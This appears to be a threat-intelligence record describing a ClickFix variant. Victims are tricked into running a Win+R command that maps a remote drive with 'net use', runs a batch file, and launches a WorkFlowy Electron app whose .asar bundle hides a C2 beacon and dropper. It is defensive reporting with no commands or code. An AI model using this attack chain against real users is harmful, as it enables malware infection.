216.73.217.80

Investigating a new Click-fix variant

· Published 16/03/2026 10:28 · Modified 16/03/2026 10:52

Export JSON

Essential information

Published
16/03/2026 10:28
Modified
16/03/2026 10:52
Tags
2026-03-16 clickfix
Related entities
6 observables, 13 techniques (mitre), 1 malware, 2 others

Description

A new variant of the technique has been identified, where attackers convince users to execute malicious commands on their devices through the Win + R shortcut. This variation uses a 'net use' command to map a network drive from an external server, followed by executing a '.cmd' batch file. The script downloads a ZIP archive, unpacks it, and executes a legitimate WorkFlowy application with modified, malicious logic hidden inside an '.asar' archive. This acts as a C2 beacon and a dropper for the final malware payload. The attack bypasses typical detection methods and utilizes Electron application bundling to hide malicious code.

External references